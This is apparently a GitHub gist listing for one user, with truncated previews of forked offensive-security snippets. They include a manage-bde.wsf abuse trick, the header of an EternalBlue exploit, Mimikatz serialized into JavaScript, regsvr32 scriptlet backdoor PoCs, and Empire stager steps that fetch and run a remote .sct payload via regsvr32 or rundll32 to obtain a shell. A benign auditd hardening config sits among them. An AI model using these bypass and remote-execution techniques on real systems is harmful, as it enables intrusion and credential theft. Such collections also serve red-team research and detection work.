I hereby claim:
- I am coh7eiqu8thaBu on github.
- I am jeromepoggi (https://keybase.io/jeromepoggi) on keybase.
- I have a public key whose fingerprint is C34A C116 1AA2 84AD 2592 1F98 FBB0 84A0 34AF BB17
To claim this, I am signing this object:
coh7eiqu8thaBu coh7eiqu8thaBu
coh7eiqu8thaBu
/ manage-bde.wsf.txt
Created
April 2, 2018 19:59
— forked from bohops/manage-bde.wsf.txt
Abusing manage-bde.wsf
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| I came across an interesting Windows Script File (WSF) that has been around a while called 'manage-bde.wsf'. It may be located in SYSTEM32. | |
| Though not nearly as cool as SyncAppvPublishingServer[.com/.vbs], we can 'tamper' with manage-bde.wsf to run things in unattended ways. | |
| Here are a few examples that you may or may not find useful - | |
| 1) Replace ComSpec Variable | |
| set comspec=c:\windows\system32\calc.exe | |
| cscript manage-bde.wsf |
coh7eiqu8thaBu
/ audit.rules
Created
December 9, 2017 18:24
— forked from Neo23x0/audit.rules
Linux Auditd Best Practice Configuration
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Linux Audit Daemon - Best Practice Configuration | |
| # /etc/audit/audit.rules | |
| # | |
| # Based on rules published here: | |
| # Gov.uk auditd rules | |
| # https://github.com/gds-operations/puppet-auditd/pull/1 | |
| # CentOS 7 hardening | |
| # https://highon.coffee/blog/security-harden-centos-7/#auditd---audit-daemon | |
| # Linux audit repo | |
| # https://github.com/linux-audit/audit-userspace/tree/master/rules |
coh7eiqu8thaBu
/ sepsplit.c
Created
November 26, 2017 15:08
— forked from xerub/sepsplit.c
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| /* | |
| * SEP firmware split tool | |
| * | |
| * Copyright (c) 2017 xerub | |
| */ | |
| #include <fcntl.h> | |
| #include <stddef.h> | |
| #include <stdio.h> | |
| #include <stdlib.h> |
coh7eiqu8thaBu
/ keybase.md
Created
October 9, 2017 15:49
coh7eiqu8thaBu
/ makeself.tgz.b64
Created
October 2, 2017 19:21
Create Linux Self Extracting Archive
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| H4sIAHWR0lkAA+2963obx7Eomr+a7zxEG2YWyRUAJEjRsknTCURCEmLeQpCWFVGf | |
| NAAGxETADDIzIAknPu9znuM8zX6LU7e+DQaS7HglZ39bWCsWiOnpS3V13at6Gr6P | |
| 8mgyauw0W829rd/9T3y24fNkb4/+hU/5X/re2n6y+2Tv8e6Tx7u/227tbO+0fqf2 | |
| /kdmU/rM8yLMlPpdlqbFh9p97Pn/pp+pv//6z2brNxwDN/irx49X7f/u450nZv8f | |
| twBPWrtfPXn8O7X9G85h5ef/8P1vXr1QNb3rNVVrwf8QFR7XgmYPHp21Tzu1QDdQ | |
| Nw3VTtS8iCdxsVBFqm6jJMrCIlKERNFDkYWDIuxPIhVmg3F8F+VN7qj36uyq/SP0 | |
| enKhguZTZbp8fTPqprMiTpP8ZnTxRr/3dhhnahRPordJOI3UJOxHE3oR2+OeFfPZ | |
| 23yQxbOCXsOfw+yW+uARjzu9o8vuxVX3/EyGvRrHuZpl6W0WThV8DdUoiyK18fzi | |
| ZNMsahjl8W0SDXF1gyyqXFugFwcdpFPoByYbDYo0WzRhjv2MJ3BOY/fM4JEapZNJ | |
| eh8nt0pWDKuF7uezWZoV0bAp0Lm6UK09XGvjrq4ajbsoy6FxcJHFSZGrdF6oAjoz |
coh7eiqu8thaBu
/ eternalblue8_exploit.py
Created
May 17, 2017 18:49
— forked from worawit/eternalblue8_exploit.py
Eternalblue exploit for Windows 8/2012
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/python | |
| from impacket import smb | |
| from struct import pack | |
| import os | |
| import sys | |
| import socket | |
| ''' | |
| EternalBlue exploit for Windows 8 and 2012 by sleepya | |
| The exploit might FAIL and CRASH a target system (depended on what is overwritten) |
coh7eiqu8thaBu
/ katz.js
Created
April 29, 2017 13:54
Mimikatz in JS - Courtesy of James Forshaw - https://github.com/tyranid/DotNetToJScript ;-)
This file has been truncated, but you can view the full file.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| var serialized_obj = [ | |
| 0,1,0,0,0,255,255,255,255,1,0,0,0,0,0,0,0,4,1,0,0,0,34,83,121,115,116,101,109,46,68,101,108, | |
| 101,103,97,116,101,83,101,114,105,97,108,105,122,97,116,105,111,110,72,111,108,100,101,114,3,0,0,0,8,68,101,108, | |
| 101,103,97,116,101,7,116,97,114,103,101,116,48,7,109,101,116,104,111,100,48,3,3,3,48,83,121,115,116,101,109,46, | |
| 68,101,108,101,103,97,116,101,83,101,114,105,97,108,105,122,97,116,105,111,110,72,111,108,100,101,114,43,68,101,108,101, | |
| 103,97,116,101,69,110,116,114,121,34,83,121,115,116,101,109,46,68,101,108,101,103,97,116,101,83,101,114,105,97,108,105, | |
| 122,97,116,105,111,110,72,111,108,100,101,114,47,83,121,115,116,101,109,46,82,101,102,108,101,99,116,105,111,110,46,77, | |
| 101,109,98,101,114,73,110,102,111,83,101,114,105,97,108,105,122,97,116,105,111,110,72,111,108,100,101,114,9,2,0,0, | |
| 0,9,3,0,0,0,9,4,0,0,0,4,2,0,0,0,48,83,121,115,116,101,109,46,68,101,108,101,103,97,116,101, |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?XML version="1.0"?> | |
| <scriptlet> | |
| <registration | |
| progid="PoC" | |
| classid="{F0001111-0000-0000-0000-0000FEEDACDC}" > | |
| <!-- Proof Of Concept - Casey Smith @subTee --> | |
| <!-- License: BSD3-Clause --> | |
| <script language="JScript"> | |
| <![CDATA[ | |
| //x86 only. C:\Windows\Syswow64\regsvr32.exe /s /u /i:file.sct scrobj.dll |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?XML version="1.0"?> | |
| <scriptlet> | |
| <registration | |
| description="Empire" | |
| progid="Empire" | |
| version="1.00" | |
| classid="{20001111-0000-0000-0000-0000FEEDACDC}" | |
| > | |
| <!-- regsvr32 /s /i"C:\Bypass\Backdoor.sct" scrobj.dll --> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| 1. Create Empire Listener | |
| 2. Generate Stager | |
| 3. Host Stager Code At Some URL | |
| 4. Host .sct File At Some URL | |
| 5. On host, execute regsvr32.exe /i:http://server/empire.sct scrobj.dll | |
| 6. Instanitate the Object. ( ex: $s=New-Object -COM "Empire";$s.Exec() ) | |
| -Or This rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();s=new%20ActiveXObject("Empire");s.Exec(); | |
| 7. Wait for Shell... |